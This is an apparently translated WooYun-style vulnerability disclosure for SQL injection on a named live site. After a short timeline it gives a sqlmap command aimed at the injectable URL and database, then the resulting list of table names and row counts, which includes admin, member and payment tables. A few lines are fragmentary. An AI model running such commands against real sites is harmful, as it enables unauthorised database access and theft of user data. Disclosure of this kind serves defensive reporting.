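2016-03-23: Actively contacting the vendor and waiting for the vendor to claim the report; details are not public.
2016-05-07: The vendor has actively ignored the vulnerability; details are disclosed to the public.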
RT
Injection point:
[root@Hacker~]# Sqlmap -u "http://cs.funxoo.com/eshouselist.php?catid=78&posids=13&p= posids=13" -D fx_newwebsite_cs --count --tables
Tables
Database: fx_newwebsite_cs
+-----------------------+---------+
| Table                 | Entries |
+-----------------------+---------+
| fx_log                | 47225   |
| fx_search             | 39041   |
| fx_content_tag        | 30978   |
| fx_hits               | 28850   |
| fx_attachment         | 28041   |
| fx_content_position   | 13822   |
| fx_pay_exchange       | 10332   |
| fx_ads_stat           | 5830    |
| fx_keyword            | 5519    |
| fx_content            | 2263    |
| fx_content_count      | 2187    |
| fx_c_news             | 1912    |
| fx_spider_urls        | 1740    |
| fx_admin_role_priv    | 1688    |
| fx_c_house            | 1621    |
| fx_member             | 1521    |
| fx_member_cache       | 1521    |
| fx_member_info        | 1520    |
| fx_space              | 1515    |
| fx_member_detail      | 932     |
| fx_member_group_priv  | 920     |
| fx_keylink            | 530     |
| fx_menu               | 529     |
| fx_c_zt               | 515     |
| fx_copyfrom           | 479     |
| fx_model_field        | 450     |
| fx_member_agent       | 411     |
| fx_cache_count        | 338     |
| fx_mood_data          | 316     |
| fx_digg_log           | 307     |
| fx_author             | 286     |
| fx_digg               | 244     |
| fx_c_video            | 198     |
| fx_category           | 193     |
| fx_member_companys    | 137     |
| fx_pay_stat           | 125     |
| fx_ask_posts          | 110     |
| fx_c_picture          | 86      |
| fx_ads                | 77      |
| fx_ask                | 68      |
| fx_type               | 57      |
| fx_editor_data        | 53      |
| fx_comment            | 52      |
| fx_c_eshouse          | 45      |
| fx_spider_job         | 45      |
| fx_ads_place          | 43      |
| fx_ask_credit         | 36      |
| fx_urlrule            | 29      |
| fx_position           | 26      |
| fx_ask_actor          | 25      |
| fx_link               | 22      |
| fx_module             | 22      |
| fx_form_tuangou       | 21      |
| fx_process_status     | 21      |
| fx_block              | 20      |
| fx_c_czhouse          | 19      |
| fx_admin_role         | 18      |
| fx_mail_email         | 18      |
| fx_model              | 18      |
| fx_admin              | 14      |
| fx_area               | 13      |
| fx_mail_email_type    | 12      |
| fx_mail               | 11      |
| fx_message            | 11      |
| fx_formguide_fields   | 10      |
| fx_vote_option        | 9       |
| fx_special_content    | 8       |
| fx_member_group       | 7       |
| fx_status             | 7       |
| fx_role               | 6       |
| fx_search_type        | 6       |
| fx_player             | 5       |
| fx_spider_sites       | 5       |
| fx_member_company     | 4       |
| fx_times              | 4       |
| fx_yp_stats           | 4       |
| fx_session            | 3       |
| fx_space_api          | 3       |
| fx_special            | 3       |
| fx_vote_subject       | 3       |
| fx_yp_count           | 3       |
| fx_error_report       | 2       |
| fx_pay_pointcard_type | 2       |
| fx_ask_vote           | 1       |
| fx_formguide          | 1       |
| fx_mood               | 1       |
| fx_process            | 1       |
| fx_vote_useroption    | 1       |
| fx_workflow           | 1       |
+-----------------------+---------+
Filtering.
Unable to contact the vendor, or the vendor actively refused.
Vulnerability Rank: 15 (rated by WooYun)